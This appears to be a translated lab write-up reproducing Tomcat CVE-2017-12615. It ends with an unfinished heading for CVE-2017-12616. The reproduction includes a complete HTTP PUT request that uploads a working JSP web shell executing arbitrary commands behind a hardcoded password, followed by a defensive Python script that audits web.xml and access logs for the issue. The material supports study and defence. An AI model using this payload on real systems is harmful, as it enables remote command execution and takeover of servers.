Tomcat Vulnerability Reproduction

1. CVE-2017-12615

Reference: http://blog.csdn.net/qq1124794084/article/details/78044756

Reproduction steps:

Step 1: Download Tomcat 7.0.21.

Step 2: Edit the conf/web.xml file and add the readonly parameter set to false:

  <init-param>
      <param-name>readonly</param-name>
      <param-value>false</param-value>
  </init-param>

Step 3: Start Tomcat.

Step 4: Open Burp Suite Free Edition v1.7.27.

Step 5: In the Repeater tab of Burp Suite Free, enter the following (note: the IP and port are those of the server on which Tomcat is running):

PUT /123.jsp/ HTTP/1.1
Host: 10.20.129.14:8080
User-Agent: JNTASS
DNT:1
Connection: close
Content-Length: 660

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

Step 6: Click Go.

Step 7: In the dialog that pops up, enter the IP of the server running Tomcat and Tomcat's web port.

Step 9: Click Go.

Step 10: The response is as follows:

HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Tue, 26 Sep 2017 07:07:31 GMT
Connection: close

Step 11: Look in the webapps/ROOT directory under the Tomcat installation directory; the file 123.jsp is now there.
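
A defender-side check for the setup reproduced above, as an added example that is not part of the original post: it audits a web.xml for servlets with readonly set to false (step 2) and flags successful PUT requests for JSP paths in an access log (steps 5 to 10). The function names, sample web.xml and sample log lines are constructed, and the log is assumed to use Tomcat's default access-log pattern.

```python
import re
import xml.etree.ElementTree as ET

def local(tag):
    return tag.rsplit("}", 1)[-1]  # drop the XML namespace, whatever schema version

def writable_servlets(web_xml_text):
    """Return names of servlets whose init-param readonly is set to false."""
    found = []
    root = ET.fromstring(web_xml_text)
    for servlet in (e for e in root.iter() if local(e.tag) == "servlet"):
        name, readonly = None, None
        for child in servlet:
            if local(child.tag) == "servlet-name":
                name = (child.text or "").strip()
            elif local(child.tag) == "init-param":
                kv = {local(c.tag): (c.text or "").strip() for c in child}
                if kv.get("param-name") == "readonly":
                    readonly = kv.get("param-value", "").lower()
        if readonly == "false":
            found.append(name)
    return found

# Assumed log layout: Tomcat's default pattern  %h %l %u %t "%r" %s %b
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def suspicious_puts(log_lines):
    """Return (client, path, status) for successful PUTs whose path names a JSP."""
    hits = []
    for m in filter(None, map(LOG_RE.match, log_lines)):
        client, method, path, status = m.groups()
        # 201 = file created, 204 = existing file overwritten
        if method == "PUT" and status in ("201", "204") and re.search(r"\.jspx?", path, re.I):
            hits.append((client, path, int(status)))
    return hits

# Constructed sample inputs (not taken from a real server).
SAMPLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee">
  <servlet>
    <servlet-name>default</servlet-name>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""
SAMPLE_LOG = [
    '10.20.129.7 - - [26/Sep/2017:15:07:31 +0800] "PUT /123.jsp/ HTTP/1.1" 201 -',
    '10.20.129.7 - - [26/Sep/2017:15:07:40 +0800] "GET /index.jsp HTTP/1.1" 200 11418',
]

if __name__ == "__main__":
    print(writable_servlets(SAMPLE_WEB_XML), suspicious_puts(SAMPLE_LOG))
```

Any servlet name returned by the audit means HTTP PUT can write into the web application; removing the readonly init-param (it defaults to true) closes that path.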


2. CVE-2017-12616

server.xml file: VirtualDirContext